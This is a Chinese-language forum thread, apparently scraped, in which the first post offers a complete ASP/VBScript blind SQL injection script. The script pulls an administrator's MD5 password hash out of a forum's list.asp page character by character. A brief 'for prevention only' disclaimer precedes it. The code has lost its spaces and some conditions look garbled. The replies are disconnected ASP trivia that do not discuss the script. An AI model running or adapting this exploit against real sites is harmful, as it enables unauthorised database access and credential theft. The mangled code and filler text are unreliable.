仓酷云

标题: ASP网页设计SQL注进研讨 [打印本页]

作者: 分手快乐 时间: 2015-1-16 23:09
标题: ASP网页设计SQL注进研讨
缺点：安全性不是太差了，还行，只要你充分利用系统自带的工具；唯一缺点就是执行效率慢，如何进行网站优化以后，效果会比较好。请勿用于不法用处，本代码只是为了让宽大ASP喜好者分明道理，提防于已然。

Functionbytes2BSTR(vIn)
dimstrReturn
dimi,ThisCharCode,NextCharCode
strReturn=""
Fori=1ToLenB(vIn)
ThisCharCode=AscB(MidB(vIn,i,1))
IfThisCharCode<&H80Then
strReturn=strReturn&Chr(ThisCharCode)
Else
NextCharCode=AscB(MidB(vIn,i+1,1))
strReturn=strReturn&Chr(CLng(ThisCharCode)*&H100+CInt(NextCharCode))
i=i+1
EndIf
Next
bytes2BSTR=strReturn
EndFunction

functiongetHTTPPage(url)
dimhttp
sethttp=createobject("MSXML2.XMLHTTP")
Http.open"GET",url,false
Http.send()
ifHttp.readystate4then
exitfunction
endif
getHTTPPage=bytes2BSTR(Http.responseBody)
sethttp=nothing
iferr.number0thenerr.Clear
endfunction

FunctionRegExpTest(patrn,strng)
DimregEx,retVal创建变量。
SetregEx=NewRegExp创建正则表达式。
regEx.Pattern=patrn设置形式。
regEx.IgnoreCase=False设置是不是辨别巨细写。
RegExpTest=regEx.Test(strng)实行搜刮测试。
EndFunction

password=""
keyword="论坛首页"前往准确页面会呈现的字符串
url1="http://qq/bbs/list.asp?boardid=7"SQL注进出口
passlen=32MD5暗码一般是32位
dimpass
pass=array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102)暗码值一般是0-9，a-f

server.ScriptTimeout=999
fori=1topasslen
flag=false
url=url1&"and(selectasc(mid(password,"&i&",1))fromadminwhereid>0)="机关的SQL语句这里才是关头
forj=0toubound(pass)
str=getHTTPPage(url&pass(j))
flag=RegExpTest(keyword,str)
ifflag=truethen
password=password&chr(pass(j))
exitfor
endif
next
next

response.Write(password)

</p>asp,jsp,php是web开发的三大技术,asp简单易用且有microsoft做靠山,jsp功能强大是因为有java支持,php则开源跨平台.在国内,asp应用范围最广,jsp发展势头最猛,php则处于劣势.这可能与公司的支持以及技术的培训有关.

作者: 谁可相欹 时间: 2015-1-20 07:43
代码的可重用性差：由于是面向结构的编程方式，并且混合html，所以可能页面原型修改一点，整个程序都需要修改，更别提代码重用了。

作者: 再见西城 时间: 2015-1-24 16:59
Server:这个表示的服务器，操作服务器的一些东西使用这个，如Server.Mappath转换服务器路径,Server.CreateObject实例化一个组件

作者: admin 时间: 2015-1-24 23:21
用户端的浏览器不需要提供任何别的支持，这样大提高了用户与服务器之间的交互的速度。

作者: 小魔女 时间: 2015-2-2 13:43
Session:这个存储跟客户端会话过程的数据，默认20分钟失效

作者: 冷月葬花魂 时间: 2015-2-7 21:43
它可通过内置的组件实现更强大的功能，如使用A-DO可以轻松地访问数据库。

作者: 第二个灵魂 时间: 2015-2-23 11:32
Request:从字面上讲就是“请求”，因此这个是处理客户端提交的东东的,例如Resuest.Form，Request.QueryString,或者干脆Request("变量名")

作者: 小妖女 时间: 2015-3-7 08:31
Response:从字面上讲是“响应”，因此这个是服务端向客户端发送东西的，例如Response.Write

作者: 愤怒的大鸟 时间: 2015-3-14 15:34
它可通过内置的组件实现更强大的功能，如使用A-DO可以轻松地访问数据库。

作者: 海妖 时间: 2015-3-21 11:26
ASP（ActiveServerPages）是Microsfot公司1996年11月推出的WEB应用程序开发技术，它既不是一种程序语言，也不是一种开发工具，而是一种技术框架，不须使用微软的产品就能编写它的代码，能产生和执行动态、交互式、高效率的站占服务器的应用程序。

欢迎光临仓酷云 (http://ckuyun.com/)